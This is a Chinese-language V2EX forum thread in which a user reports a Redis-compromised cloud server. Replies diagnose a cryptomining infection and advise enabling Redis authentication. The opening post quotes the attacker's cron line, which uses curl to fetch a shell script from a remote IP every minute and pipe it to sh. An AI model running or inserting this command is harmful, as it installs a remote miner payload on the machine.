租的腾讯云主机安装 redis 后没几天, 发现多了一条记录, 是不是被入侵了...

2017-07-06 17:03:32 +08:00

PickMio

*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

4336 次点击

所在节点

12 条回复

weiweiwitch

2017-07-06 17:08:26 +08:00

redis 启用密码了吗，没有启用的话，很容易被入侵。

killerv

2017-07-06 17:14:27 +08:00

redis 最好限制外网访问+启用认证

expy

2017-07-06 17:14:46 +08:00

被挖矿了吧 233

shakoon

2017-07-06 17:18:17 +08:00

是被入侵了，该机器被用作了挖矿的肉鸡

PickMio

2017-07-06 17:19:05 +08:00

@expy #3 貌似是的, 下载了一个 minerd 程序..

PickMio

2017-07-06 17:19:21 +08:00

@weiweiwitch #1 没设置...

shakoon

2017-07-06 17:20:03 +08:00

PickMio

2017-07-06 17:41:41 +08:00

@shakoon #7 好, 我看看

evlos

2017-07-06 17:47:36 +08:00

看一下那个人的挖矿账号累计挖到了 200 多 XMR，差不多一万多人民币

Itanium

2017-07-06 17:56:01 +08:00

现在 CPU 挖矿效率很高吗？

realpg

2017-07-06 18:23:30 +08:00

你一定是用了 centos

msg7086

2017-07-07 02:30:42 +08:00

不要跟我说你 redis 给的权限能大到任意改写系统文件哦？

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.